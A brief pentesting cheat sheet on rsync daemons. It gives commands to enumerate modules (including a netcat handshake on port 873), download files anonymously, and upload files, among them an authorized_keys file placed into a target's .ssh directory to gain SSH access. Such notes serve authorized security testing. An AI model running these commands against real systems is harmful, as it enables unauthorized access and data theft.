# rsync

* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)
* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync)

## Enumerate

```sh
rsync <target-IP>::
rsync <target-IP>::files
rsync <target-IP>::files/foo/
```

### via netcat

* Another way is the following
```sh
nc -vn $TARGET_IP 873
```
* Repeat the identical handshake, e.g.
```
@RSYNCD: 31.0
```
* List all directories
```sh
#list
```

## Downloads

```sh
rsync <user>@<target-IP>::/files/foo/bar.txt .
rsync -r <user>@<target-IP>::/files/foo .
```
Use no credentials at all to connect anonymously.

## Uploads

```sh
rsync authorized_keys <user>@<target-IP>::/files/foo/.ssh/
rsync -r documents <user>@<target-IP>::/files/foo/
```